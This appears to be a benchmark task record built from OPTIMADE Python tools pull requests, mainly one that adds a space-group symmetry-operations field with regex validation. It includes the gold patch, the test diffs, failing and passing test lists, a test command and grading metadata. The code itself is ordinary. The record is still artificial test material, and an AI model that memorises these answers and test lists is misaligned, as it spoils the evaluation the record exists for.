ENTRY_COLLECTIONS[_type].resource_mapper.get_backend_field("id") + + # Take the raw database result, extract the OPTIMADE ID and try to insert a canary + # document containing just that ID, plus a fake MongoDB ID to avoid '_id' clashes + canary = {id_field: result["id"], "_id": ObjectId(24 * "0")} + # Match either for "Duplicate" (mongomock) or "duplicate" (mongodb) + with pytest.raises(pymongo.errors.BulkWriteError, match="uplicate"): + ENTRY_COLLECTIONS[_type].insert([canary]) # type: ignore diff --git a/tests/test_config.json b/tests/test_config.json index b011371a..43787f4e 100644 --- a/tests/test_config.json +++ b/tests/test_config.json @@ -17,6 +17,7 @@ "mongo_count_timeout": 0, "index_base_url": "http://localhost:5001", "insert_from_jsonl": "optimade/server/data/test_data.jsonl", + "create_default_index": true, "provider_fields": { "structures": [ "band_gap",
[ "tests/server/entry_collections/test_indexes.py::test_indexes_are_created_where_appropriate" ]
[]
Method: EntryCollection.insert(self, data: list[EntryResource | dict]) -> None Location: optimade/server/entry_collections/entry_collections.py – class EntryCollection Inputs: - **data** – a list containing either `EntryResource` objects (already mapped to the backend format) or raw `dict` objects representing OPTIMADE entries. No validation is performed; callers must ensure the items are correctly formatted for the underlying database. Outputs: - Returns `None`. May propagate database‑specific exceptions (e.g., duplicate‑key errors) raised by concrete implementations. Description: Abstract method that bulk‑inserts entries into the underlying database. The signature was widened to accept plain dictionaries, allowing callers such as the test suite to insert a minimal canary document without constructing a full `EntryResource` instance. Method: MongoCollection.insert(self, data: list[EntryResource | dict]) -> None Location: optimade/server/entry_collections/mongo.py – class MongoCollection Inputs: - **data** – list of entry representations (either `EntryResource` instances or raw `dict`s) to be written to a MongoDB collection. No validation is performed. Outputs: - Returns `None`. May raise `pymongo.errors.BulkWriteError` (e.g., on duplicate `_id` or unique‑index violations). Description: Concrete MongoDB implementation of the bulk‑insert operation. The method now forwards the mixed‑type list to `collection.insert_many(..., ordered=False)`, enabling the test to insert a dictionary containing only the `id` field and trigger the unique‑index error handling. Method: ElasticCollection.insert(self, data: list[EntryResource | dict]) -> None Location: optimade/server/entry_collections/elasticsearch.py – class ElasticCollection Inputs: - **data** – list of entries, each either an `EntryResource` object or a raw dictionary ready for Elasticsearch indexing. No validation is performed. Outputs: - Returns `None`. May raise Elasticsearch‑specific exceptions on bulk‑indexing failures (e.g., duplicate‑id errors). Description: Elasticsearch implementation of the bulk‑insert operation. The signature was updated to accept raw dictionaries, matching the new abstract definition and allowing the test suite to insert a minimal document for index‑duplicate detection.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/server/entry_collections/test_indexes.py" }
{ "num_modified_files": 6, "num_modified_lines": 116, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests improved JSONL insertion error handling, parallel MongoDB inserts, and optional index creation via a new config flag. The provided test checks that default indices are created when the flag is true, aligning with the described behavior. No mismatches, external dependencies, or ambiguous specifications are present. Therefore the task is clearly defined and solvable, classified as A.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
e171370b70f66dd849211689b5f4aad3a766d6fb
2025-02-28 12:35:08
codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report Attention: Patch coverage is `90.90909%` with `1 line` in your changes missing coverage. Please review. > Project coverage is 90.58%. Comparing base [(`e171370`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e171370b70f66dd849211689b5f4aad3a766d6fb?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`e86fcd4`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e86fcd40013711fc240a06aa33f79cb1208d1ffb?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). | [Files with missing lines](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?dropdown=coverage&src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Patch % | Lines | |---|---|---| | [optimade/models/structures.py](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?src=pr&el=tree&filepath=optimade%2Fmodels%2Fstructures.py&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3N0cnVjdHVyZXMucHk=) | 88.88% | [1 Missing :warning: ](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## main #2236 +/- ## ========================================== + Coverage 90.57% 90.58% +0.01% ========================================== Files 75 75 Lines 4889 4899 +10 ========================================== + Hits 4428 4438 +10 Misses 461 461 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.58% <90.90%> (+0.01%)` | :arrow_up: | | [validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.58% <90.90%> (+0.01%)` | :arrow_up: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2236?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia).
materials-consortia__optimade-python-tools-2236
diff --git a/openapi/openapi.json b/openapi/openapi.json index e2c67e8e..94ef86e7 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -4340,6 +4340,24 @@ "x-optimade-support": "should", "x-optimade-unit": "\u00c5" }, + "space_group_symmetry_operations_xyz": { + "anyOf": [ + { + "items": { + "type": "string", + "pattern": "^([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?)$" + }, + "type": "array" + }, + { + "type": "null" + } + ], + "title": "Space Group Symmetry Operations Xyz", + "description": "A list of symmetry operations given as general position x, y and z coordinates in algebraic form.\n\n- **Type**: list of strings\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - The property is RECOMMENDED if coordinates are returned in a form to which these operations can or must be applied (e.g. fractional atom coordinates of an asymmetric unit).\n - The property is REQUIRED if symmetry operations are necessary to reconstruct the full model of the material and no other symmetry information (e.g., the Hall symbol) is provided that would allow the user to derive symmetry operations unambiguously.\n - **Query***: Support for queries on this property is not required and in fact is NOT RECOMMENDED.\n - MUST be `null` if `nperiodic_dimensions` is equal to 0.\n - Each symmetry operation is described by a string that gives that symmetry operation in Jones' faithful representation (Bradley & Cracknell, 1972: pp. 35-37), adapted for computer string notation.\n - The letters `x`, `y` and `z` that are typesetted with overbars in printed text represent coordinate values multiplied by -1 and are encoded as `-x`, `-y` and `-z`, respectively.\n - The syntax of the strings representing symmetry operations MUST conform to regular expressions given in appendix The Symmetry Operation String Regular Expressions.\n - The interpretation of the strings MUST follow the conventions of the IUCr CIF core dictionary (IUCr, 2023). In particular, this property MUST explicitly provide all symmetry operations needed to generate all the atoms in the unit cell from the atoms in the asymmetric unit, for the setting used.\n - This symmetry operation set MUST always include the `x,y,z` identity operation.\n - The symmetry operations are to be applied to fractional atom coordinates. In case only Cartesian coordinates are available, these Cartesian coordinates must be converted to fractional coordinates before the application of the provided symmetry operations.\n - If the symmetry operation list is present, it MUST be compatible with other space group specifications (e.g. the ITC space group number, the Hall symbol, the Hermann-Mauguin symbol) if these are present.\n\n- **Examples**:\n - Space group operations for the space group with ITC number 3 (H-M symbol `P 2`, extended H-M symbol `P 1 2 1`, Hall symbol `P 2y`): `[\"x,y,z\", \"-x,y,-z\"]`\n - Space group operations for the space group with ITC number 5 (H-M symbol `C 2`, extended H-M symbol `C 1 2 1`, Hall symbol `C 2y`): `[\"x,y,z\", \"-x,y,-z\", \"x+1/2,y+1/2,z\", \"-x+1/2,y+1/2,-z\"]`\n\n- **Notes**: The list of space group symmetry operations applies to the whole periodic array of atoms and together with the lattice translations given in the `lattice_vectors` property provides the necessary information to reconstruct all atom site positions of the periodic material.\n Thus, the symmetry operations described in this property are only applicable to material models with at least one periodic dimension.\n This property is not meant to represent arbitrary symmetries of molecules, non-periodic (finite) collections of atoms or non-crystallographic symmetry.\n\n- **Bibliographic References**:\n - Bradley, C. J. and Cracknell, A. P. (1972) The Mathematical Theory of Symmetry in Solids. Oxford, Clarendon Press (paperback edition 2010) 745 p. ISBN 978-0-19-958258-7.\n - IUCr (2023) Core dictionary (coreCIF) version 2.4.5; data name `_space_group_symop_operation_xyz`. Available from: https://www.iucr.org/__data/iucr/cifdic_html/1/cif_core.dic/Ispace_group_symop_operation_xyz.html [Accessed 2023-06-18T16:46+03:00].", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, "cartesian_site_positions": { "anyOf": [ { diff --git a/optimade/models/structures.py b/optimade/models/structures.py index c9d724e0..c61770a8 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -6,7 +6,7 @@ from typing import TYPE_CHECKING, Annotated, Literal, Optional from pydantic import BaseModel, BeforeValidator, Field, field_validator, model_validator from optimade.models.entries import EntryResource, EntryResourceAttributes -from optimade.models.types import ChemicalSymbol +from optimade.models.types import ChemicalSymbol, SymmetryOperation from optimade.models.utils import ( ANONYMOUS_ELEMENTS, CHEMICAL_FORMULA_REGEXP, @@ -564,6 +564,43 @@ Note: the elements in this list each refer to the direction of the corresponding ), ] = None + space_group_symmetry_operations_xyz: Annotated[ + list[SymmetryOperation] | None, + OptimadeField( + description="""A list of symmetry operations given as general position x, y and z coordinates in algebraic form. + +- **Type**: list of strings + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - The property is RECOMMENDED if coordinates are returned in a form to which these operations can or must be applied (e.g. fractional atom coordinates of an asymmetric unit). + - The property is REQUIRED if symmetry operations are necessary to reconstruct the full model of the material and no other symmetry information (e.g., the Hall symbol) is provided that would allow the user to derive symmetry operations unambiguously. + - **Query***: Support for queries on this property is not required and in fact is NOT RECOMMENDED. + - MUST be `null` if `nperiodic_dimensions` is equal to 0. + - Each symmetry operation is described by a string that gives that symmetry operation in Jones' faithful representation (Bradley & Cracknell, 1972: pp. 35-37), adapted for computer string notation. + - The letters `x`, `y` and `z` that are typesetted with overbars in printed text represent coordinate values multiplied by -1 and are encoded as `-x`, `-y` and `-z`, respectively. + - The syntax of the strings representing symmetry operations MUST conform to regular expressions given in appendix The Symmetry Operation String Regular Expressions. + - The interpretation of the strings MUST follow the conventions of the IUCr CIF core dictionary (IUCr, 2023). In particular, this property MUST explicitly provide all symmetry operations needed to generate all the atoms in the unit cell from the atoms in the asymmetric unit, for the setting used. + - This symmetry operation set MUST always include the `x,y,z` identity operation. + - The symmetry operations are to be applied to fractional atom coordinates. In case only Cartesian coordinates are available, these Cartesian coordinates must be converted to fractional coordinates before the application of the provided symmetry operations. + - If the symmetry operation list is present, it MUST be compatible with other space group specifications (e.g. the ITC space group number, the Hall symbol, the Hermann-Mauguin symbol) if these are present. + +- **Examples**: + - Space group operations for the space group with ITC number 3 (H-M symbol `P 2`, extended H-M symbol `P 1 2 1`, Hall symbol `P 2y`): `["x,y,z", "-x,y,-z"]` + - Space group operations for the space group with ITC number 5 (H-M symbol `C 2`, extended H-M symbol `C 1 2 1`, Hall symbol `C 2y`): `["x,y,z", "-x,y,-z", "x+1/2,y+1/2,z", "-x+1/2,y+1/2,-z"]` + +- **Notes**: The list of space group symmetry operations applies to the whole periodic array of atoms and together with the lattice translations given in the `lattice_vectors` property provides the necessary information to reconstruct all atom site positions of the periodic material. + Thus, the symmetry operations described in this property are only applicable to material models with at least one periodic dimension. + This property is not meant to represent arbitrary symmetries of molecules, non-periodic (finite) collections of atoms or non-crystallographic symmetry. + +- **Bibliographic References**: + - Bradley, C. J. and Cracknell, A. P. (1972) The Mathematical Theory of Symmetry in Solids. Oxford, Clarendon Press (paperback edition 2010) 745 p. ISBN 978-0-19-958258-7. + - IUCr (2023) Core dictionary (coreCIF) version 2.4.5; data name `_space_group_symop_operation_xyz`. Available from: https://www.iucr.org/__data/iucr/cifdic_html/1/cif_core.dic/Ispace_group_symop_operation_xyz.html [Accessed 2023-06-18T16:46+03:00].""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ), + ] = None + cartesian_site_positions: Annotated[ list[Vector3D] | None, OptimadeField( @@ -1069,6 +1106,23 @@ The properties of the species are found in the property `species`. return value + @model_validator(mode="after") + def check_symmetry_operations(self) -> "StructureResourceAttributes": + if self.nperiodic_dimensions == 0 and self.space_group_symmetry_operations_xyz: + raise ValueError( + "Non-periodic structures MUST NOT have space group symmetry operations." + ) + + if ( + self.space_group_symmetry_operations_xyz + and "x,y,z" not in self.space_group_symmetry_operations_xyz + ): + raise ValueError( + "The identity operation 'x,y,z' MUST be included in the space group symmetry operations, if provided." + ) + + return self + @model_validator(mode="after") def validate_structure_features(self) -> "StructureResourceAttributes": if [ diff --git a/optimade/models/types.py b/optimade/models/types.py index 8ed7f99d..d081db51 100644 --- a/optimade/models/types.py +++ b/optimade/models/types.py @@ -7,12 +7,15 @@ from optimade.models.utils import ( ELEMENT_SYMBOLS_PATTERN, EXTENDED_CHEMICAL_SYMBOLS_PATTERN, SEMVER_PATTERN, + SYMMETRY_OPERATION_REGEXP, ) __all__ = ("ChemicalSymbol", "SemanticVersion") ChemicalSymbol = Annotated[str, Field(pattern=EXTENDED_CHEMICAL_SYMBOLS_PATTERN)] +SymmetryOperation = Annotated[str, Field(pattern=SYMMETRY_OPERATION_REGEXP)] + ElementSymbol = Annotated[str, Field(pattern=ELEMENT_SYMBOLS_PATTERN)] SemanticVersion = Annotated[ diff --git a/optimade/models/utils.py b/optimade/models/utils.py index fde64c6e..75ad8eb4 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -233,6 +233,7 @@ ANONYMOUS_ELEMENTS = tuple(itertools.islice(anonymous_element_generator(), 150)) """ Returns the first 150 values of the anonymous element generator. """ CHEMICAL_FORMULA_REGEXP = r"(^$)|^([A-Z][a-z]?([2-9]|[1-9]\d+)?)+$" +SYMMETRY_OPERATION_REGEXP = r"^([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?)$" EXTRA_SYMBOLS = ["X", "vacancy"]
Add support for `space_group_symmetry_operations_xyz` As above. Adds the OPTIMADE 1.2 field `space_group_symmetry_operations_xyz`, superseding #1422.
**Title** Add OPTIMADE 1.2 `space_group_symmetry_operations_xyz` support to the Structure model **Problem** The latest OPTIMADE specification introduces a new optional property describing symmetry operations in algebraic “x, y, z” notation. The library’s data model and OpenAPI description did not expose this field, and no validation existed for the required constraints (e.g., presence of the identity operation and prohibition for non‑periodic structures). **Root Cause** The schema definitions and pydantic models lacked an entry for the new property and the associated type/regex, and the model did not enforce the specification‑defined rules. **Fix / Expected Behavior** - Expose the `space_group_symmetry_operations_xyz` attribute in the Structure resource with proper OPTIMADE metadata (optional support, optional queryability). - Define a dedicated string type constrained by the official symmetry‑operation regular expression. - Extend the OpenAPI specification to include the new property, its description, and metadata. - Add model‑level validation that: • rejects symmetry operations for structures with zero periodic dimensions, and • requires the identity operation “x,y,z” when any operations are supplied. **Risk & Validation** - Ensure existing payloads without the new field remain valid (field is optional). - Run the full test suite and verify OpenAPI output to confirm the property appears correctly and validation triggers appropriate errors for non‑conforming data. - Check that the added regex does not inadvertently reject legitimate symmetry strings used in current datasets.
2,236
Materials-Consortia/optimade-python-tools
diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py index 3d8b2539..2e9fd5c5 100644 --- a/tests/adapters/structures/test_structures.py +++ b/tests/adapters/structures/test_structures.py @@ -191,6 +191,7 @@ def compare_lossy_conversion( "immutable_id", "species", "fractional_site_positions", + "space_group_symmetry_operations_xyz", ) array_keys = ("cartesian_site_positions", "lattice_vectors") diff --git a/tests/models/test_data/test_bad_structures.json b/tests/models/test_data/test_bad_structures.json index 95f67c1f..eecfe3cb 100644 --- a/tests/models/test_data/test_bad_structures.json +++ b/tests/models/test_data/test_bad_structures.json @@ -2331,5 +2331,71 @@ {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], "structure_features": ["site_attachments"] + }, + { + "task_id": "db/1234567", + "type": "structure", + "last_modified": { + "$date": "inf" + }, + "band_gap": 1.23456, + "chemsys": "C-H-Cl-N-Na-O-Os-P", + "elements": ["C", "Cl", "H", "N", "Na", "O", "Os", "P"], + "nelements": 8, + "nsites": 7, + "elements_ratios": [0.09090909091, 0.36363636363, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091], + "chemical_formula_reduced": "CClH4NNaOOsP", + "chemical_formula_hill": "H4CClNNaOOsP", + "chemical_formula_descriptive": "Methyl-ClNNaOOsP", + "formula_anonymous": "A4BCDEFGH", + "dimension_types": [1, 1, 1], + "nperiodic_dimensions": 3, + "lattice_vectors": [[4.0,0.0,0.0],[0.0, 4.0, 0.0],[0.0,1.0,4.0]], + "cartesian_site_positions": [ [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0] ], + "species_at_sites": ["Cl", "O", "N", "met", "Os", "Na", "P"], + "species": [ + {"name": "Cl", "chemical_symbols": ["Cl"], "concentration": [1.0] }, + {"name": "O", "chemical_symbols": ["O"], "concentration": [1.0], "mass": [12.0, 14.0] }, + {"name": "N", "chemical_symbols": ["N"], "concentration": [1.0] }, + {"name": "met", "chemical_symbols": ["C"], "concentration": [1.0], "attached": ["H"], "nattached": [4] }, + {"name": "Os", "chemical_symbols": ["Os"], "concentration": [1.0] }, + {"name": "Na", "chemical_symbols": ["Na"], "concentration": [1.0] }, + {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } + ], + "structure_features": ["site_attachments"], + "space_group_symmetry_operations_xyz": ["-x,-y,-z"] + }, + { + "task_id": "db/1234567", + "type": "structure", + "last_modified": { + "$date": "inf" + }, + "band_gap": 1.23456, + "chemsys": "C-H-Cl-N-Na-O-Os-P", + "elements": ["C", "Cl", "H", "N", "Na", "O", "Os", "P"], + "nelements": 8, + "nsites": 7, + "elements_ratios": [0.09090909091, 0.36363636363, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091, 0.09090909091], + "chemical_formula_reduced": "CClH4NNaOOsP", + "chemical_formula_hill": "H4CClNNaOOsP", + "chemical_formula_descriptive": "Methyl-ClNNaOOsP", + "formula_anonymous": "A4BCDEFGH", + "dimension_types": [1, 1, 1], + "nperiodic_dimensions": 0, + "lattice_vectors": [[4.0,0.0,0.0],[0.0, 4.0, 0.0],[0.0,1.0,4.0]], + "cartesian_site_positions": [ [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0] ], + "species_at_sites": ["Cl", "O", "N", "met", "Os", "Na", "P"], + "species": [ + {"name": "Cl", "chemical_symbols": ["Cl"], "concentration": [1.0] }, + {"name": "O", "chemical_symbols": ["O"], "concentration": [1.0], "mass": [12.0, 14.0] }, + {"name": "N", "chemical_symbols": ["N"], "concentration": [1.0] }, + {"name": "met", "chemical_symbols": ["C"], "concentration": [1.0], "attached": ["H"], "nattached": [4] }, + {"name": "Os", "chemical_symbols": ["Os"], "concentration": [1.0] }, + {"name": "Na", "chemical_symbols": ["Na"], "concentration": [1.0] }, + {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } + ], + "structure_features": ["site_attachments"], + "space_group_symmetry_operations_xyz": ["x,y,z", "-x,-y,-z"] } ] diff --git a/tests/models/test_data/test_good_structures.json b/tests/models/test_data/test_good_structures.json index b8460583..c06a32dc 100644 --- a/tests/models/test_data/test_good_structures.json +++ b/tests/models/test_data/test_good_structures.json @@ -125,7 +125,8 @@ "group_probabilities": [0.3, 0.5, 0.2] } ], - "structure_features": ["assemblies", "implicit_atoms"] + "structure_features": ["assemblies", "implicit_atoms"], + "space_group_symmetry_operations_xyz": ["x,y,z", "-x,y,-z"] }, { "task_id": "db/1234567", @@ -189,7 +190,8 @@ {"name": "Na", "chemical_symbols": ["Na"], "concentration": [1.0] }, {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], - "structure_features": ["site_attachments"] + "structure_features": ["site_attachments"], + "space_group_symmetry_operations_xyz": ["x,y,z", "-x,y,-z", "x+1/2,y+1/2,z", "-x+1/2,y+1/2,-z"] }, { "task_id": "db/1234567", @@ -221,6 +223,7 @@ {"name": "Na", "chemical_symbols": ["Na"], "concentration": [1.0] }, {"name": "P", "chemical_symbols": ["P"], "concentration": [1.0] } ], - "structure_features": ["disorder", "site_attachments"] + "structure_features": ["disorder", "site_attachments"], + "space_group_symmetry_operations_xyz": ["x,y,z"] } ] diff --git a/tests/models/test_structures.py b/tests/models/test_structures.py index d9d1aaeb..bafee17d 100644 --- a/tests/models/test_structures.py +++ b/tests/models/test_structures.py @@ -203,6 +203,14 @@ deformities = ( {"chemical_formula_anonymous": "A44B15C9D4E3F2GHI0J0K0L0"}, "String should match pattern", ), + ( + {"space_group_symmetry_operations_xyz": ["-x,-y,-z"]}, + "The identity operation 'x,y,z' MUST be included in the space group symmetry operations, if provided.", + ), + ( + {"space_group_symmetry_operations_xyz": ["xy,z"]}, + "String should match pattern", + ), ) diff --git a/tests/server/test_client.py b/tests/server/test_client.py index 4c0e1972..3e02ca41 100644 --- a/tests/server/test_client.py +++ b/tests/server/test_client.py @@ -509,7 +509,7 @@ def test_list_properties( results = cli.list_properties("structures") for database in results: - assert len(results[database]) == 22, str(results[database]) + assert len(results[database]) == 23, str(results[database]) results = cli.search_property("structures", "site") for database in results:
[ "tests/models/test_structures.py::test_structure_fatal_deformities[deformity28]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity29]", "tests/server/test_client.py::test_list_properties[True]", "tests/server/test_client.py::test_list_properties[False]" ]
[ "tests/adapters/structures/test_structures.py::test_instantiate", "tests/adapters/structures/test_structures.py::test_setting_entry", "tests/adapters/structures/test_structures.py::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::test_getattr_order", "tests/adapters/structures/test_structures.py::test_no_module_conversion", "tests/adapters/structures/test_structures.py::test_common_converters", "tests/adapters/structures/test_structures.py::test_two_way_conversion[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion[ase]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[ase]", "tests/adapters/structures/test_structures.py::test_load_good_structure_from_url", "tests/adapters/structures/test_structures.py::test_load_bad_structure_from_url", "tests/models/test_structures.py::test_good_structure_with_missing_data", "tests/models/test_structures.py::test_more_good_structures", "tests/models/test_structures.py::test_bad_structures", "tests/models/test_structures.py::test_structure_fatal_deformities[None]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity1]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity2]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity3]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity4]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity5]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity6]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity7]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity8]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity9]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity10]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity11]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity12]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity13]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity14]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity15]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity16]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity17]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity18]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity19]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity20]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity21]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity22]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity23]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity24]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity25]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity26]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity27]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity0]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity1]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity2]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity3]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity4]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity5]", "tests/server/test_client.py::test_client_endpoints[False]", "tests/server/test_client.py::test_client_endpoints[True]", "tests/server/test_client.py::test_filter_validation[True]", "tests/server/test_client.py::test_filter_validation[False]", "tests/server/test_client.py::test_client_response_fields[True]", "tests/server/test_client.py::test_client_response_fields[False]", "tests/server/test_client.py::test_multiple_base_urls[True]", "tests/server/test_client.py::test_multiple_base_urls[False]", "tests/server/test_client.py::test_include_exclude_providers[True]", "tests/server/test_client.py::test_include_exclude_providers[False]", "tests/server/test_client.py::test_client_sort[True]", "tests/server/test_client.py::test_client_sort[False]", "tests/server/test_client.py::test_command_line_client[True]", "tests/server/test_client.py::test_command_line_client[False]", "tests/server/test_client.py::test_command_line_client_silent[True]", "tests/server/test_client.py::test_command_line_client_silent[False]", "tests/server/test_client.py::test_command_line_client_multi_provider[True]", "tests/server/test_client.py::test_command_line_client_multi_provider[False]", "tests/server/test_client.py::test_command_line_client_write_to_file[True]", "tests/server/test_client.py::test_command_line_client_write_to_file[False]", "tests/server/test_client.py::test_strict_async[True]", "tests/server/test_client.py::test_strict_async[False]", 